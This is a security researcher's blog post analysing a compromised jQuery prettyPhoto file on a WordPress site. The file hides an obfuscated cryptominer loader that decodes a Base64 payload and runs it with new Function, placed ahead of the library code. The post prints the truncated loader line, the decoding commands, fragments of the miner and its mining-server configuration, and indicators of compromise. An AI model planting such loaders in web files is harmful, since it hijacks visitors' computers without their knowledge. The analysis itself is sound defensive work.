Cryptominer Delivered Though Compromized JavaScript File, (Fri, Jul 13th)

Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer’s IDS alerts on the following URL:

hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js

This website is not referenced as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the package pretty photo[1] but the one hosted on safeyourhealth[.]ru was modified.

The original one starts like this:

(function($) { 
    $.prettyPhoto = {version: '3.1.4'};

    $.fn.prettyPhoto = function(pp_settings) { 
        pp_settings = jQuery.extend({ 
...

The malicious one started like this:

new Function(atob(“dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))()
(function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function()
...

The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function used to decode Base64. Let’s extract the payload and decode it:

$ curl —socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | 
  grep atob | 
  awk -F ‘“‘ ‘{ print $2 }’ | 
  base64 -d >jquery.prettyphoto.js.decoded
$ cat jquery.prettyphoto.js.decoded
var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Beex20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expectingx20firstx20messagex20tox20bex20x22readyx22,x20gotx
...

The script is obfuscated with a very big array (_0x49e6) which contains pieces of strings and code.
You can easily spot the behaviour of the script with the following snippet of code:

var _0x348ae9 = navigator['hardwareConcurrency'] || 4;

The navigator.hardwareConcurrency is a read-only property which returns the number of logical processors available to run threads on the computer. Always interesting for a cryptominer to know how many threads can be started.

If the code was obfuscated, strings were not. More interesting strings are easy to find:

self[_0x169f('0x98')][_0x169f('0x4b')] = {
    'LIB_URL': _0x169f('0xb2'),
    'ASMJS_NAME': _0x169f('0xb3'),
    'REQUIRES_AUTH': ![],
    'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']],
    'CAPTCHA_URL': 'https://coinhive.com/captcha/',
    'MINER_URL': _0x169f('0xb4'),
    'AUTH_URL': 'https://authedmine.com/authenticate.html'
};

I wrote a VTI hunting rule to search for scripts containing the string “navigator[‘hardwareConcurrency’]” and I got some hits last night. All of them where submitted for the first time yesterday and got a score of 6/59:

90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
58c2c761ca127e6392f72ac60b7f6cbf20fa52db7e7f94468e1640ee3a132c21
56a2eebc67293799a01fa74a9d206ba336bc6df5c32ae68987d110e9bcd81cc2
90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
7fa97e4b27e8542a0fc330bdd9cadccd1bafa166269a3bf846f7663b9f992be1
835a19b59e1e2aeeb538509022581202756ee13e78b4d1c6592918ec854168bb
ded2b6d76a00a67c60f0488b2d0507334363314552edc31a1fd29fdbebc493f6
d920455b0d5f4783fb0fa3504ac14d540a3835774515cdc26284514ebad83f37
ad453a6563ee5e1c522a4405c57e0740db343ba180981f4da65a19b9b8aaa883

All of them use the same IP address: %%ip:148.251.136.203%%.

I also searched for similar compromized jquery.prettyphoto.js files. This code is used on many websites but I did not find other malicious occurrences. Please share if you find some.

[1] https://github.com/scaron/prettyphoto
[2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.